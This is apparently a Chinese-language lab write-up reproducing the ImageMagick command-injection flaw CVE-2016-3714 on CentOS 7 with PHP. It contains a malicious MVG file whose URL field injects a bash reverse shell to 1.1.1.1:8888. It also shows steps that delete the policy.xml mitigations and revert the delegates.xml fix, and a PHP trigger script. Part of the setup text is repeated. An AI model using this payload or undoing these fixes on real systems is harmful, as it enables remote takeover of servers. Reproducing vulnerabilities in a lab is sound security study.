我的环境是centos7 ,php是PHP 5.4.16,ImageMagick是6.7.8-9正好在影响范围之内,但是官方还是对其官网上所有的安装包进行了修复,所以现在下载下来的任何版本的ImageMagick都是不存在漏洞的,
我们看看官方都是怎么修复的,并且还原漏洞现场
漏洞原理在:https://jiji262.github.io/wooyun_articles/drops/CVE-2016-3714%20-%20ImageMagick%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90.html
首先安装ImageMagick:
参考:http://jingyan.baidu.com/article/91f5db1be6ded11c7f05e3d3.html
yum install ImageMagick
yum install ImageMagick-devel
yum install php-pear
yum -y install php-devel
yum install gcc
pecl install imagick (这个之内在php 5.3的版本以上才能安装成功)
echo extension=imagick.so >> /etc/php.ini (这个是将ImageMagick加载到php中)
这个时候我们vim test.mvg
我们看看官方都是怎么修复的,并且还原漏洞现场
漏洞原理在:https://jiji262.github.io/wooyun_articles/drops/CVE-2016-3714%20-%20ImageMagick%20%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90.html
首先安装ImageMagick:
参考:http://jingyan.baidu.com/article/91f5db1be6ded11c7f05e3d3.html
yum install ImageMagick
yum install ImageMagick-devel
yum install php-pear
yum -y install php-devel
yum install gcc
pecl install imagick (这个之内在php 5.3的版本以上才能安装成功)
echo extension=imagick.so >> /etc/php.ini (这个是将ImageMagick加载到php中)
这个时候我们vim test.mvg
内容是:
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/1.1.1.1/8888 0>&1")'
pop graphic-context
保存,然后
converttest.mvg test.png
发现没有权限
我查看:
/etc/ImageMagick/policy.xml
发现在配置文件里面已经加入了修复配置:
<policymap>
<policy domain="coder" rights="none" pattern="EPHEMERAL" />
<policy domain="coder" rights="none" pattern="URL" />
<policy domain="coder" rights="none" pattern="HTTPS" />
<policy domain="coder" rights="none" pattern="MVG" />
<policy domain="coder" rights="none" pattern="MSL" />
</policymap>
我删掉这些
然后再运行一下,依然不成功,我继续查看:/etc/ImageMagick/delegates.xml
查找https
发现:
修复前配置文件的https部分:
<delegatedecode="https" command=""curl" -s -k-o "%o" "https:%M""/>
修复后:
<delegatedecode="https" command=""curl" -s -k-o "%o" "https:%F""/>
红色部分就是官方修复的位置
将配置文件修改之后:
converttest.mvg test.png
成功出发漏洞,反弹一个shell回本机
写一个php文件来证明这个漏洞:
<?php
$thu= new Imagick();
$thu->readImage('test.mvg');
$thu->writeImage('KKKK.png');
$thu->clear();
$thu->destroy();
unlink("KKKK.png");
?>
用phptest.php 来执行一下
成功触发,并且反弹